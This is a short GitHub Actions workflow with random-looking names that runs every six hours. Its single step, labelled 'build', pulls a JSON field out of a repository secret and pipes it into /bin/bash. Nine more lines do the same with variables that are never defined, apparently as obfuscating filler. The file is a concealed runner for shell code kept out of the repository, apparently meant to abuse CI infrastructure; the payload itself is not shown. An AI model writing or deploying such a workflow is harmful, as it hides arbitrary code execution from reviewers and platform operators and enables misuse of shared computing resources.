name: xu7anxa
on:
  workflow_dispatch:
  schedule:
    - cron: '13 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xu7anxa
        env:
          hwtwc8: ${{ secrets.hwtwc8 }}
        run: |
          echo $hwtwc8 | jq -r .evc80545 | /bin/bash
          echo $smxl86957 | jq -r .kee55 | /bin/bash
          echo $oix80 | jq -r .oqw2917 | /bin/bash
          echo $er04 | jq -r .gyxbo035 | /bin/bash
          echo $lxqrp5960 | jq -r .qw349 | /bin/bash
          echo $am9 | jq -r .dwwtb89 | /bin/bash
          echo $ljgt98 | jq -r .fsgdz9626 | /bin/bash
          echo $eld27 | jq -r .ioyv71852 | /bin/bash
          echo $fgn74950 | jq -r .jvai98132 | /bin/bash
          echo $nchz04 | jq -r .imgqx4713 | /bin/bash

